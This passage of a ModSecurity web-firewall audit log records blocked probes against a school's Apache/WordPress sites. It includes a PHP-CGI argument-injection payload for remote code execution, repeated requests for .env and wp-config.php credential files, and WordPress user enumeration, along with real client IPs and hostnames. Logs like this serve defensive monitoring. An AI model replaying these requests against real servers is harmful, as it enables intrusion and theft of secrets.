disable_functions=\x22\x22 \x5cxadd allow_url_include=1 \x5cxadd auto_prepend_file=php://input: \xadd cgi.force_redirect=0 \xadd disable_functions=\x22\x22 \xadd allow_url_include=1 \xadd auto_prepend_file=php://input"] [severity "CRITICAL"] [tag "CWAF"] [tag "PHPGen"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746784299081599 4136 (- - -) Stopwatch2: 1746784299081599 4136; combined=2622, p1=459, p2=2127, p3=0, p4=0, p5=36, sr=114, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b442b000-Z-- --0da5314a-A-- [09/May/2025:16:55:26 +0700] aB3RDloC-7ITMWTA_c8RfwAAAMc 103.236.140.4 55460 103.236.140.4 8181 --0da5314a-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.242.34.171 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.242.34.171 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --0da5314a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --0da5314a-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746784526813092 2219 (- - -) Stopwatch2: 1746784526813092 2219; combined=1000, p1=345, p2=629, p3=0, p4=0, p5=25, sr=62, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --0da5314a-Z-- --0f2dd14e-A-- [09/May/2025:16:55:33 +0700] aB3RFVoC-7ITMWTA_c8RoQAAAMs 103.236.140.4 55970 103.236.140.4 8181 --0f2dd14e-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.242.34.171 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.242.34.171 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --0f2dd14e-C-- demo.sayHello --0f2dd14e-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --0f2dd14e-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746784533648267 5273 (- - -) Stopwatch2: 1746784533648267 5273; combined=3842, p1=491, p2=3101, p3=30, p4=33, p5=106, sr=66, sw=81, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --0f2dd14e-Z-- --43728869-A-- [09/May/2025:17:00:37 +0700] aB3SRS-fAO47ojYKsMqy9gAAAFc 103.236.140.4 49862 103.236.140.4 8181 --43728869-B-- GET /.env HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 159.223.51.157 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 159.223.51.157 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 Accept: */* --43728869-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --43728869-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746784837431991 622 (- - -) Stopwatch2: 1746784837431991 622; combined=223, p1=190, p2=0, p3=0, p4=0, p5=33, sr=48, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --43728869-Z-- --5e68082c-A-- [09/May/2025:17:27:37 +0700] aB3YmVqQ1nOVx9fWpZR_wAAAAAk 103.236.140.4 53650 103.236.140.4 8181 --5e68082c-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 217.160.15.151 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 217.160.15.151 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --5e68082c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --5e68082c-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746786457041848 2843 (- - -) Stopwatch2: 1746786457041848 2843; combined=1245, p1=408, p2=801, p3=0, p4=0, p5=36, sr=69, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --5e68082c-Z-- --0f5d5d15-A-- [09/May/2025:18:18:15 +0700] aB3kd1oC-7ITMWTA_c9TKAAAAMs 103.236.140.4 47314 103.236.140.4 8181 --0f5d5d15-B-- GET /wp-config.php HTTP/1.1 Referer: www.google.com Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 139.59.224.251 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http User-Agent: Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Upgrade-Insecure-Requests: 1 Accept-Language: en-US,en;q=0.9,fr;q=0.8 Cookie: X-Forwarded-For: 139.59.224.251 Accept-Encoding: gzip X-Varnish: 144982385 --0f5d5d15-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --0f5d5d15-H-- Message: Access denied with code 403 (phase 1). Matched phrase "wp-config.php" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746789495247628 734 (- - -) Stopwatch2: 1746789495247628 734; combined=281, p1=248, p2=0, p3=0, p4=0, p5=33, sr=67, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --0f5d5d15-Z-- --13729626-A-- [09/May/2025:18:18:15 +0700] aB3kdx6q_ZMebht3q14ZgAAAAJg 103.236.140.4 47530 103.236.140.4 8181 --13729626-B-- GET /wp-config.php HTTP/1.1 Referer: www.google.com Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 139.59.224.251 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Upgrade-Insecure-Requests: 1 Accept-Language: en-US,en;q=0.9,fr;q=0.8 Cookie: X-Forwarded-For: 139.59.224.251 Accept-Encoding: gzip X-Varnish: 145066033 --13729626-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --13729626-H-- Message: Access denied with code 403 (phase 1). Matched phrase "wp-config.php" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746789495268687 813 (- - -) Stopwatch2: 1746789495268687 813; combined=301, p1=267, p2=0, p3=0, p4=0, p5=34, sr=72, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --13729626-Z-- --1d58dd5c-A-- [09/May/2025:18:23:03 +0700] aB3ll1oC-7ITMWTA_c9T3QAAAME 103.236.140.4 48474 103.236.140.4 8181 --1d58dd5c-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 103.90.233.71 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 103.90.233.71 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --1d58dd5c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --1d58dd5c-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746789783842510 2827 (- - -) Stopwatch2: 1746789783842510 2827; combined=1491, p1=447, p2=1009, p3=0, p4=0, p5=35, sr=77, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --1d58dd5c-Z-- --028a4452-A-- [09/May/2025:18:24:14 +0700] aB3l3h6q_ZMebht3q14ZgQAAAJQ 103.236.140.4 48708 103.236.140.4 8181 --028a4452-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 203.96.224.65 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 203.96.224.65 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --028a4452-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --028a4452-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746789854671740 3241 (- - -) Stopwatch2: 1746789854671740 3241; combined=1530, p1=510, p2=990, p3=0, p4=0, p5=30, sr=85, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --028a4452-Z-- --497d4234-A-- [09/May/2025:18:31:24 +0700] aB3njB6q_ZMebht3q14azgAAAJE 103.236.140.4 50374 103.236.140.4 8181 --497d4234-B-- GET /wp-config.php HTTP/1.0 Referer: www.google.com Host: up.smkn22jakarta.sch.id X-Real-IP: 139.59.224.251 X-Forwarded-Host: up.smkn22jakarta.sch.id X-Forwarded-Server: up.smkn22jakarta.sch.id X-Forwarded-For: 139.59.224.251 X-Forwarded-Proto: http Connection: close User-Agent: Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 Accept-Language: en-US,en;q=0.9,fr;q=0.8 --497d4234-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --497d4234-H-- Message: Access denied with code 403 (phase 1). Matched phrase "wp-config.php" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746790284686767 729 (- - -) Stopwatch2: 1746790284686767 729; combined=263, p1=230, p2=0, p3=0, p4=0, p5=33, sr=67, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --497d4234-Z-- --00f1e133-A-- [09/May/2025:18:31:24 +0700] aB3njFqQ1nOVx9fWpZSkSQAAAAk 103.236.140.4 50376 103.236.140.4 8181 --00f1e133-B-- GET /wp-config.php HTTP/1.0 Referer: www.google.com Host: up.smkn22jakarta.sch.id X-Real-IP: 139.59.224.251 X-Forwarded-Host: up.smkn22jakarta.sch.id X-Forwarded-Server: up.smkn22jakarta.sch.id X-Forwarded-For: 139.59.224.251 X-Forwarded-Proto: https Connection: close User-Agent: Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 Accept-Language: en-US,en;q=0.9,fr;q=0.8 --00f1e133-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --00f1e133-H-- Message: Access denied with code 403 (phase 1). Matched phrase "wp-config.php" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746790284726029 724 (- - -) Stopwatch2: 1746790284726029 724; combined=294, p1=262, p2=0, p3=0, p4=0, p5=32, sr=82, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --00f1e133-Z-- --80128814-A-- [09/May/2025:18:56:28 +0700] aB3tbB6q_ZMebht3q14bagAAAJI 103.236.140.4 53618 103.236.140.4 8181 --80128814-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 185.136.194.203 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 185.136.194.203 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --80128814-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --80128814-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746791788475554 2202 (- - -) Stopwatch2: 1746791788475554 2202; combined=1073, p1=351, p2=694, p3=0, p4=0, p5=28, sr=68, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --80128814-Z-- --018a8f6b-A-- [09/May/2025:18:58:52 +0700] aB3t_C-fAO47ojYKsMrx9gAAAE8 103.236.140.4 53638 103.236.140.4 8181 --018a8f6b-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 197.230.116.154 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 197.230.116.154 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --018a8f6b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --018a8f6b-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746791932819693 3072 (- - -) Stopwatch2: 1746791932819693 3072; combined=1293, p1=427, p2=837, p3=0, p4=0, p5=29, sr=77, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --018a8f6b-Z-- --e3142b76-A-- [09/May/2025:19:03:02 +0700] aB3u9i-fAO47ojYKsMrx-gAAAEk 103.236.140.4 53670 103.236.140.4 8181 --e3142b76-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 102.134.52.114 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 102.134.52.114 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --e3142b76-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --e3142b76-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746792182390167 2733 (- - -) Stopwatch2: 1746792182390167 2733; combined=1249, p1=411, p2=808, p3=0, p4=0, p5=30, sr=75, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e3142b76-Z-- --60c3ea2b-A-- [09/May/2025:19:13:00 +0700] aB3xTFqQ1nOVx9fWpZSm0gAAABI 103.236.140.4 53730 103.236.140.4 8181 --60c3ea2b-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 78.153.140.224 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 78.153.140.224 X-Forwarded-Proto: https Connection: close Accept: */* User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.98 Safari/537.36 OPR/44.0.2510.857 --60c3ea2b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --60c3ea2b-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746792780908878 913 (- - -) Stopwatch2: 1746792780908878 913; combined=402, p1=362, p2=0, p3=0, p4=0, p5=40, sr=134, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --60c3ea2b-Z-- --63951c2d-A-- [09/May/2025:19:13:04 +0700] aB3xUB6q_ZMebht3q14bbAAAAJU 103.236.140.4 53734 103.236.140.4 8181 --63951c2d-B-- GET /api/.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 78.153.140.224 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 78.153.140.224 X-Forwarded-Proto: https Connection: close Accept: */* User-Agent: Mozilla/5.0 (Macintosh; U; PPC Mac OS X; de-de) AppleWebKit/416.12 (KHTML, like Gecko) Safari/416.13_Adobe --63951c2d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --63951c2d-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746792784073697 805 (- - -) Stopwatch2: 1746792784073697 805; combined=319, p1=279, p2=0, p3=0, p4=0, p5=40, sr=75, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --63951c2d-Z-- --3aab5934-A-- [09/May/2025:19:13:07 +0700] aB3xU1qQ1nOVx9fWpZSm1AAAAAs 103.236.140.4 53736 103.236.140.4 8181 --3aab5934-B-- GET /admin/.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 78.153.140.224 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 78.153.140.224 X-Forwarded-Proto: https Connection: close Accept: */* User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.63 Safari/537.36 --3aab5934-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --3aab5934-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746792787285858 815 (- - -) Stopwatch2: 1746792787285858 815; combined=356, p1=318, p2=0, p3=0, p4=0, p5=38, sr=130, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --3aab5934-Z-- --ea19f636-A-- [09/May/2025:19:13:08 +0700] aB3xVFqQ1nOVx9fWpZSm1QAAAAQ 103.236.140.4 53738 103.236.140.4 8181 --ea19f636-B-- GET /backend/.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 78.153.140.224 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 78.153.140.224 X-Forwarded-Proto: https Connection: close Accept: */* User-Agent: Mozilla/5.0 (X11; U; Linux i686; de; rv:1.8.1.5) Gecko/20060911 SUSE/2.0.0.5-1.2 Firefox/2.0.0.5 --ea19f636-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --ea19f636-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746792788275927 649 (- - -) Stopwatch2: 1746792788275927 649; combined=256, p1=222, p2=0, p3=0, p4=0, p5=34, sr=66, sw=0, 